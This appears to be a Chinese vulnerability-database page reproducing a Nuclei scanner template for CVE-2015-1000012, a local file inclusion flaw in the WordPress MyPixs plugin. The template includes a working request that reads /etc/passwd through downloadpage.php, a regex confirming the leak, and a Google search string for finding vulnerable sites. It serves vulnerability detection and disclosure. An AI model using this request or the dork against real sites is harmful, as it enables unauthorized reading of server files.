CVE-2015-1000012: WordPress MyPixs <=0.3 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress MyPixs | POC: 已公开

漏洞描述

WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.

PoC代码[已公开]

id: CVE-2015-1000012

info:
  name: WordPress MyPixs <=0.3 - Local File Inclusion
  author: daffainfo
  severity: high
  description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the server.
  remediation: |
    Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability.
  reference:
    - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
    - http://www.vapidlabs.com/advisory.php?v=154
    - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-1000012
    cwe-id: CWE-200
    epss-score: 0.68585
    epss-percentile: 0.98576
    cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: mypixs_project
    product: mypixs
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/mypixs"
  tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c8c39b106eca9127ee3501f1dfeed89cb8de1fd9927540cb28aea9068afaa04c022100d9579af06409805ca96a077f0e3daf76aee46339fb48c6a60c6f3712d12af883:922c64590222798bb761d5b6d8e72950

相关漏洞推荐